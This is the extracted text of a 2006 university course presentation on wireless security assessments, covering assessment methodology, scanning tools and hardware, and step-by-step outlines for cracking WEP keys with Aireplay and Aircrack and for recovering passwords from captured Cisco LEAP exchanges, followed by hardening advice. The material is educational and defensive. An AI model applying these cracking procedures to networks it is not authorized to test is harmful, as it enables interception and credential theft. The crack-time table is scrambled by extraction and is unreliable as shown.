DGRZETICH_TDC531_Presentation

Wireless Security Assessments
D. Grzetich - July 2006
DePaul University – TDC 531

DePaul University – TDC 531 – Wireless Security| 2
Outline
• Wireless Vulnerabilities
• Assessment Methodology
• Assessment Hardware/Software
• Cracking WEP
• Cracking LEAP
• Future Trends

Wireless Risks
Σ Wired Risks
+ Wireless Protocol Risks
= Wireless Risks

Wireless Vulnerabilities
• Accidental Association
– Clients are always attempting to connect to other devices
• Malicious Association
– Easy to coheres client to associate with other device
• MAC Address Spoofing (Client)
– Access Point MAC ACL’s are ineffective
• MAC Address Spoofing (Access Point)/MITM
– Difficult to detect access points that have changed MAC address to
authorized one
• Insertion
– The weak WEP encryption makes traffic insertion possible
What specific attacks are possible?

Wireless Vulnerabilities
• Interception and unauthorized monitoring
– Sniffing network traffic
– Broadcast nature
• Client to client attacks (see BlackHat 06’)
– Using wireless network to attack workstations and servers
– Driver issues identified, buffer overflow attacks possible
• Encryption attacks
– Sniffing traffic to crack WEP keys
– Capture Cisco LEAP exchanges and crack offline
• Configuration attacks
– Factory installed wireless devices with pre-configured SSIDs, WEP
key settings, user IDs, and passwords

Wireless Assessment Methodology
• Assessment pre-planning
• Locate and identify wireless devices
• Use available data to validate the location of the
wireless devices
• Identify vulnerabilities or weaknesses in the wireless
infrastructure
• Exploit identified weaknesses to attempt to gain access
• Collect, analyze, and document wireless security
findings
• Communicate the results to the appropriate individuals

Locate and Identify
• Scan surroundings for wireless components (Manual)
– Antennas
– Access Points
– Clients (Wireless NICs)
• Use tools to help identify wireless devices
– Collect as much information as possible
• SSID
• Location
• Information Field
• IP Addresses
– If the SSID is masked, wait a while to collect it
• Use antennas to increase or focus coverage area
Locate and identify wireless devices

Validate
• Do the SSID or information fields contain recognizable
phrases
– Are the words significant to your business, or a neighboring company?
• What is the coverage area for the wireless device?
– Does it cover the entire building?
– Is it localized to a corner of a floor?
– Attempt to monitor signal strength and determine location
• Have any of the web sites identified these devices
– Search on MAC address
– Search on SSID if not default
• Do any IP addresses identify the location?
Use available data to validate the location of the wireless devices

Identify Vulnerabilities
• Is WEP enabled?
• Does the SSIDs or information fields give away too much
information?
• Is any other form of encryption used? (VPN, Cisco LEAP,
EAP)
• Can I sniff network traffic and gather usernames and
passwords or other useful information?
Identify vulnerabilities and weaknesses in the wireless infrastructure

Exploit
• Is the signal strong enough where I can connect?
– Can I find a location where the strength is sufficient?
• Have I collected the SSID?
– Do I have time to wait for one?
• Is WEP/LEAP enabled
– Can I crack the WEP key?
– Can I gather usernames and password via LEAP
• Connect to known internal systems to prove access
Exploit identified weaknesses to attempt to gain access

Collect and Analyze Data
Collect, analyze, and document wireless security findings

Collect and Analyze Data
• What systems can be accessed through the wireless
infrastructure?
• What data is transmitted when accessing these systems?
• Was any sensitive information observed?
• What is the potential business impact?
• What is the recommended solution to mitigate the risks?
Collect, analyze, and document wireless security findings (continued)

Communicate
• What groups are responsible for the network infrastructure?
• Should Internal Audit be involved with the results?
• If rogue access points were found, what is the process to
remove them?
Communicate the results to the appropriate individuals

Communicate
Capabilities Maturity Model for Industry Recommended Security comparison

Assessment Hardware - NICs
• Lucent Hermes or Orinoco based
– Used in Orinoco cards
– Supported by most wireless tools
– Includes an external antenna jack
• Intersil/Conexant Prism or Atheros
based
– Used in SMC, Netgear, Linksys, D-Link, and most
Proxim cards
– Commercial support OK
– The most common 802.11b network cards
• Cisco Aironet based
– Included proprietary features to improve 802.11
security – Cisco LEAP, EAP-FAST
– Farthest range and quality of reception
Many types of NICs exist for wireless devices with different features

Assessment Hardware - Antenna
Wireless antennas modify the strength
and radius of wireless detection and can
be found in following popular categories
Omni directional antenna
– Collects radio waves in
a donut shaped field
– Gain ranges from 1 dBi
to 15 dBi
– Shapes can vary from a
rod approximately from
6’ to 2” long to a slender
rectangle approximately
8’ long
Yagi antenna
– Antenna with a very small,
directional focus
– Gain ranges 8 dBi to 30 dBi
– Shape is a cylinder
approximately two feet long
and four inches diameter

Assessment Hardware - Antenna
Wireless antennas modify the strength
and radius of wireless detection and can
be found in following popular categories
Homemade antenna
– Similar construction to Yagi
– Pattern and power dependent
on size and materials used
Parabolic grid or dish
antenna
– Long distance
communications
– Focused, narrow
beam pattern,
greater x-axis
distance than Yagi

Assessment Hardware - GPS
• Satellite system that provides 3D location
coordinates of identified targets.
Global Positioning System (GPS)

Assessment Software - OS
Microsoft Windows
– Most people are comfortable navigating
– Necessary for most commercial wireless
security software
Linux
– Requires a more technical user to operate
– Most freeware wireless security software
only works on this platform
– Freeware tools available are superior on
this platform
– Bootable (all-in-one) versions like Whax or
BackTrack

Assessment Software - Tools
Freeware Tools
– Kismet
– NetStumbler
– Wellenreiter
– Airsnort/Airodump/Wireshark
– Aircrack
– Asleap/void11
Commercial Tools
– AirMagnet Survey and Laptop Analyzer
– Airopeek/Omnipeek by Wild Packets
– Sniffer Wireless by Network General

Assessment Software - Kismet
• Includes the most robust
features to identify access
points
• Works on laptops or handheld
devices
• Lacks integrated reporting
features
• Includes features to map
networks when combined with
a GPS
Kismet (Freeware, Linux)

Assessment Software - Kismet

Assessment Software - NetStumbler
• Most popular freeware tool for
Windows, but cannot detect access
points with a specific security setting
enabled
Netstumbler – (Freeware, Windows)

Sniffing Wireless Data – POP Mail

Sniffing Wireless - AIM

Cracking WEP
• No matter the key size or strength, WEP can be cracked
• Uses a modified version of the FMS attack (KoreK)
– FMS Attack required large numbers of packets
– Korek uses statistical analysis, requires unique IV’s not packets
• Not enough packets?
– Use Aireplay to replay encrypted ICMP or ARP traffic back into the network
• FBI had time down to 3 minutes in a 2005 demonstration
• Alternatives
– Brute-force via dictionary lists, WEP key generators
– Chop-chop attack to decrypt packet-by-packet by replaying encrypted
packets (inverse induction)

Cracking WEP
WEP Cracking Steps:
1. Identify target SSID by MAC/Channel
2. Tune packet capture to selected MAC/channel
3. Use Kismet or Airodump to capture wireless WEP packets
4. Identify ARP requests and/or ICMP requests using Aireplay
5. Replay encrypted traffic until sufficient number of unique IV’s are
captured
6. Dump capture into Aircrack
7. Modify the fudge factor until broken…not 100%

Cracking WEP - Aircrack

Cracking WEP – Stats and Tools
aircrack
(4) AirSnort
WepLab
(95) WEPCrack dwepcrack
23457438 8560 16775533 245 92 244 Failed Error
21016149 1807 16775167 249 41 247 Failed Failed
19584364 9340 16275925 230 114 229 Failed Failed
15690079 8694 12860342 184 90 179 Failed Error
15628308 5505 12361369 176 70 174 Failed Failed
11743639 8473 11743639 154 69 153 Failed Error
11739339 3037 11693841 150 Failed 151 Failed Failed
7829104 1001 5031233 74 Failed 77 Failed Error
7799213 5225 7779299 87 37 101 Failed Failed
3914568 767 3914568 Failed Failed Failed Failed Error
978652 986 978652 Failed Failed 11 Failed Error
587184 117 587184 27 Failed Long Failed Error
293579 65 293579 Failed Failed Failed Failed Error
Data
Packets
Weak
IVs
Unique
IVs
WEP (128 bit) Cracking Time in Seconds – 12/2004 – Michael Ossmann – Security Focus

Cracking Cisco LEAP
• Known as Cisco EAP (Lightweight Extensible Authentication Protocol)
– Billed as easy to use, secure, etc.
• Cisco sold supplicant code and considered AP code to be IP
• Dynamic WEP keys distributed after authentication and periodically
• Cisco used MS-CHAPv2 for exchange of user and pass
– No salt in passwords
– Weak DES key selection
– Cleartext username and domain
• Weakness in DES key selection from NT hash
– Allows recovery of 2 bytes of the NT hashed password

Cisco LEAP Process
8-Byte Challenge STATION
AP Issues 8-byte
Challenge to Station
Access Point1
DES Key #1
(NT 1-7)
STATION2
DES Key #2
(NT 8-14)
DES Key #3
(NT 15-16) + 5 /0's
STATION
Station sends 24-
byte response to AP
Access Point3
8-Byte Challenge
8-Byte Challenge
8-Byte Challenge
Uses 16-byte NT
hash to create 3 DES
keys
Station encrypts
challenge with DES
keys
24-byte Response
24-byte Response

Cracking Cisco LEAP
• Last DES key is 2-bytes of NT hash and padded with 5 /0’s
• Possibilities for last 2-bytes are only 2^16 (65,536)
• By cracking the last 2-bytes we reduce the password search space
– Hashing is a one way function – no collisions
– Only so many password hashes end with the same identified 2-bytes
• Maybe this makes more sense graphically?

Cisco LEAP Cracking, Step-by-Step
8-Byte Challenge
1
Compute NT hash for
all dictionary file
words
Deduce NT 15-16
through brute force
2
Password Found!
3 8-Byte Challenge
24-byte Response
Domain/Username
Dictionary File
24-byte Response
DES Key #3
(NT 15-16) + 5 /0's
4
NT 15-16 hash bytes
Match NT 15-16 to
possible passwords
Use potential
passwords, encrypt
challenge, does it
equal the response?
Capture (Kismet,
NetStumbler, etc.)

Cisco LEAP Example

Securing Wireless
Do Not Use The Following:
– SSID Hiding/Masking (wait for association)
– MAC Address Filtering (trivial to change in Linux)
– WEP
– Cisco LEAP
Do Use The Following:
– Policies and Procedures
– Network Architecture
– Strong Encryption (VPN)
– Authentication (EAP/PEAP)
– Monitoring
– Assessments

Future Trends
Policy and procedure first
Difficulty in PKI deployment – slowing EAP/PEAP
acceptance
Lack of security feature in some hardware (Cisco VoIP
Wireless)
Security implications of installing wireless – regulatory
compliance issues, SOX, PCI, HIPAA, etc.
Network segmentation – treat all wireless as guest
Increase in monitoring and IPS

Conclusion
Questions?

DGRZETICH_TDC531_Presentation

More Related Content

What's hot

Similar to DGRZETICH_TDC531_Presentation

DGRZETICH_TDC531_Presentation